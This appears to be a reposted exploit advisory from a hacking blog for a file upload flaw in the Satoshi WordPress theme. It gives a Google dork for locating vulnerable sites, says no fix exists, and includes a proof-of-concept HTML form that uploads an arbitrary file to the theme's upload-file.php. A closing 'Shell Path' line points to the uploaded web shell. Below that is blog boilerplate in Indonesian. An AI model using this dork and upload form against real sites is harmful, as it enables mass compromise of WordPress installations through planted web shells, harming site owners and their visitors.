Satoshi Theme - File Upload CSRF - 3xploi7 BuG

Satoshi Theme - File Upload CSRF



#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352
Miscellaneous

Submitter Anonymous
Views 750
Verified No
WPVDB ID 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Succes  : Succes

Shell Path : Here
• Request Artikel / Lapor link rusak = here
• Join Grup Facebook = here
• Di Rekomendasikan Menggunakan Google Chrome
Previous
Next Post »
Thanks for your comment